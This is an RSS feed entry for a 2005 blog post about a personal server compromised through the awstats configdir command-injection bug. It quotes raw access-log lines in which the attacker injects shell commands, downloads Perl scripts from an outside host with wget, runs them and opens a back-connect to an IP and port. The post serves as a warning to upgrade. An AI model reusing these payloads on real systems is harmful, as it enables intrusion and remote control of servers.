<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet href="/stylesheets/rss.css" type="text/css"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/">
  <channel>
    <title>Juju: When Script Kiddies Attack</title>
    <link>http://juju.org/articles/2005/02/15/when-script-kiddies-attack</link>
    <language>en-us</language>
    <ttl>40</ttl>
    <description>Sufficiently Advanced Technology</description>
    <item>
      <title>When Script Kiddies Attack</title>
      <description>&lt;p&gt;You might be wondering why my website has been down the last few days.  Well I was hacked.  This isn't the first time someone hacked into my server, but this was the first time I found out about it practically immediately due to some script kiddy's incompetence which brought the server to a halt.  How did they get in?  Recently I posted a script I wrote to &lt;a href="http://www.juju.org/archives/2005/01/21/derefspam"&gt;clean my log files of referral spam&lt;/a&gt; that got &lt;a href="http://www.jayallen.org/comment_spam/2005/01/using_mtblacklist_on_referrer_spam"&gt;quite&lt;/a&gt; a bit of &lt;a href="http://www.sixapart.com/pronet/2005/02/mod_security_fo.html"&gt;attention&lt;/a&gt; and I linked to my awstats showing the results.  (before that I didn't link to my stats page)  The problem is, awstats prior to version 6.3 has a &lt;a href="http://sourceforge.net/tracker/index.php?func=detail&amp;amp;aid=1110659&amp;amp;group_id=13764&amp;amp;atid=113764"&gt;bug&lt;/a&gt; that allows an attacker to run arbitrary commands on your server.  If you're running awstats, &lt;a href="http://awstats.sourceforge.net/#DOWNLOAD"&gt;UPGRADE NOW&lt;/a&gt;.  Read on for more information...&lt;/p&gt;

&lt;p&gt;&lt;!--more--&gt;&lt;/p&gt;

&lt;p&gt;The last time I got hacked was about 2 years ago due to the fact that I didn't run regular updates and there was a vulnerability in ssh.  Just like last time, the bastard broke in to install an irc bot.  &lt;em&gt;sigh&lt;/em&gt; Here are the entries in my log that show how they were able to use awstats to download and install some rootkits:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;201.9.219.9 - - [09/Feb/2005:16:31:09 -0500] "GET /archives/2004/01/11/?logfile=&amp;amp;configdir=|echo
%20;id;echo%20| HTTP/1.0" 200 24772 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
201.9.219.9 - - [09/Feb/2005:16:31:12 -0500] "GET /archives/2004/01/11/?logfile=|echo%20;id;echo
%20|&amp;amp;configdir= HTTP/1.0" 200 24772 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
201.9.219.9 - - [09/Feb/2005:16:31:28 -0500] "GET /awstats/awstats.pl?configdir=|echo
%20;echo%20&lt;strong&gt;comeco&lt;/strong&gt;;%20uname%20-a;%20id;
%20uptime;%20wget%20;echo%20&lt;strong&gt;fim&lt;/strong&gt;;echo%20| HTTP/1.1" 200 904 "-" "-"
201.9.219.9 - - [09/Feb/2005:16:36:51 -0500] "GET /awstats/awstats.pl?configdir=|echo
%20;echo%20&lt;strong&gt;comeco&lt;/strong&gt;;%20cd%20/var/tmp;%20wget
%20http://geocities.yahoo.com.br/lippemotta/door.pl;%20perl%20door.pl%20;echo%20&lt;strong&gt;fim&lt;/strong&gt;;echo%20| HTTP/1.1" 200 618 "-" "-"
201.9.219.9 - - [09/Feb/2005:16:37:29 -0500] "GET /awstats/awstats.pl?configdir=|echo
%20;echo%20&lt;strong&gt;comeco&lt;/strong&gt;;%20cd%20/var/tmp;%20
wget%20http://geocities.yahoo.com.br/lippemotta/cbserv.pl;%20perl%20cbserv.pl
%2070.64.95.79%204567%20;echo%20&lt;strong&gt;fim&lt;/strong&gt;;echo%20| HTTP/1.1" 200 639 "-" "-"&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Offending IP resolves as 201009219009.user.veloxzone.com.br.  Brazil... the question is, do I really want to go through the process of trying to report it?  I'm sure it won't do any good.  Although it was mildly amusing to look at their irc bot's config and log in to their channel and look around.  It was filled with about 30 similarly named bots, probably also running on hacked servers in some kind of network sharing videos of tv shows like The Apprentice.  Don't these people know there are much easier and more efficient ways to get such things using bittorrent... not that I'd know.  &lt;em&gt;whistles innocently&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Meanwhile, I reinstalled using Gentoo instead of Mandrake with lots of nicer security settings and options (including &lt;a href="http://www.modsecurity.org/"&gt;mod_security&lt;/a&gt;).  It's something I've been meaning to do for a while, I just wish it hadn't been forced upon me, keeping me up all night for the past few days.  I also took the time to upgrade to the latest beta of &lt;a href="http://blog.nuclearmoose.com/archives/2005/01/27/the-inside-scoop/"&gt;WordPress 1.5&lt;/a&gt;. (most excellent)  On top of all that, as I was in the process of reinstalling, I thought my hard drive had gone bad.  It turned out it was the power supply... when it rains, it pours.&lt;/p&gt;</description>
      <pubDate>Tue, 15 Feb 2005 22:40:51 -0500</pubDate>
      <guid isPermaLink="false">urn:uuid:bd1c7c7acf1542ae0d1f4ccc33edbcab</guid>
      <author>Tony Buser</author>
      <link>http://juju.org/articles/2005/02/15/when-script-kiddies-attack</link>
      <category>Internet</category>
      <category>Security</category>
      <trackback:ping>http://juju.org/articles/trackback/330</trackback:ping>
    </item>
  </channel>
</rss>
